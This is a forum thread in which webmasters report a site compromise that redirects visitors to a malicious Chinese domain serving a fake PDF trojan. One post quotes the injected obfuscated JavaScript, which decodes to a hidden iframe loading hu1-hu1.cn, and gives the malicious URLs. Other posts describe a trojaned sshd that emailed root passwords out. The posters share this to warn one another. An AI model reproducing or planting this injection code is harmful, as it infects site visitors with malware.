I will be buying hosting to someone here in DP. So I had been visiting his site since 3 days. Everything was ok, but since yesterday night, when I tried to enter the site, it redirected me to http://hu1-hu1.cn/counter/getfile.php?f=vispdf Code (markup): (DON'T ENTER!) This site opened a PDF File, which Adobe reader said that it isn't a valid PDF. I knew this was really suspicious, (Virus) so I googled the chineese URL and found only one result (OF TODAY, OCTOBER 23!!) : http://forums.permaculture.org.au/viewtopic.php?f=8&p=45188 This is interesting. Both forums.permaculture.org.au and the hosting site of that member of DP have the following code: </body> </html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = ""; for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); </script> </html> </body> Code (markup): Notice the sintax: </html> then <html> <body> and then </html> </body>. First: A valid html page only has one <html> tag and a respective closing one </html>. This page closed with the tag </html> and then opened again the html tag. Second: The <body> tag must be closed before </html>; in this case, the </html> tag is before </body>. Also, the body tag was already closed before the injection script. Another thing I noticed in the whois of hu1-hu1.cn is: 1. The IP is from Ukraine, with the same datacenter that the usb key trojan (the virus that exploits autorun.inf in flash drives and hides hidden folders) uses. 2. When I tried to visit the ip, K-9 Web Protection (installed in my PC) Said: 3. The domain is from china, same country of the same usb key virus. Beware, I use kaspersky internet security and Firefox 3 and it's possible I had gotten a virus. I am scared. I will try to visit the site in Ubuntu and I will tell you what happens. Regards
We got hit this morning too and I also found the permaculture site. Is the member you were talking about hosting with Layered Technologies? We have a co-located server with them and I noticed that permaculture is hosted with them. James Bullis Xeal.com
Yes. That member. I just don't say who is it because it would damage its reputation. Also, it is not his fault.
Hey Guys, I just wanted to give you an update on where I am at. Apparently this issue has been around for a few days now. I think it originated recently as going to prevedvsem123.cn. In the last few days the url changed a few times and we happened to catch the bug when it was going to hu1-hu1.cn. When I Googled prevedvsem123.cn I found a lot of other people being affected by this. Every one of them ties back to LT. I got a call from someone at LT and they are apparently aware of the situation. They informed me that PHP had been compromised and that sshd had been rewritten so that anytime I updated the root password it would notify an email address at @ymail. After looking back, I can see that this issue started affecting my server around the 10th and we just now received the injection. At this point, per the request of LT, and the agreement of our server consultants we are disconnecting the hard drives, and reloading the os. I figured there was something else we could have done, but based on the extent of the damage there is no telling what all has been changed. I am convinced this is a good idea since this is related to a very similar attack which occurred in September of 2007. Right now I am just waiting on the reloaded server to come back online and then I will be proceeding to clean the old data and porting it over. I wish I was a super server guy like you guys but this nub just got pwned....
First, check it is the traffic stats code. second, I guess your site is backup of asp scripts, it is easy to be injectioned. third, if it is virus, try kaspersky, it works well.
Here are your answers: 1. No it's not a traffic stats code. A tracking code does not opens a fake .PDF file. 2. I use kaspersky (didn't u read the whole post?!) and today it told me it was a trojan called Trojan-Downloader.JS.Agent.cua so yes, is a virus. 3. The site is not mine. Oh, yes, it's written in HTML.
Oh my, I heard this problem has been discussed in other forums since two days ago... I was wondering, did it has any solutions for this problem?
OMG I visited a site yesterday and there was this pdf file.. for the stupidity of me, i downloaded and adobe says its an illegal pdf. Im using mcafee, any luck to see if i have been infected by this virus? I am currently scanning my computer also i am running Vista thanks
Its Not Only Infecting the PC , Also Web Sites...... And from websites to webmasters pcs and web visitors, Really Pain Virus... Hope its fixed , Some servers down cuz of this attacks ..
i visited an infected site two days ago and kaspersky didn't find anything my pc infected and i spent 2 days backup files and formating
How do I know if I am infected? Visiting the site with firefox didn't said anything, but with IE it detected the virus... so I don't know...
Does this affect Ubuntu? I'm using FF3... I mean, you told us on the first post you'd tell us what happens on Ubuntu. There should happen nothing... and much less if Wine is not installed. Am I wrong?
Wow! Thanks for the early warning. I was wondering if I'm infected, my sister is also using my laptop and my AVG won't update.
My safelist got his by this.. and all the safelists that were on my host's shared server got infected as well.. I don't even think the other admins know yet.. but not sure if I know all the sites that are on the server to warn them.. its been a big pain in the butt to find all the files infected.. does anyone know if this can only be injected into sites with </html> in the code? and only php and html files?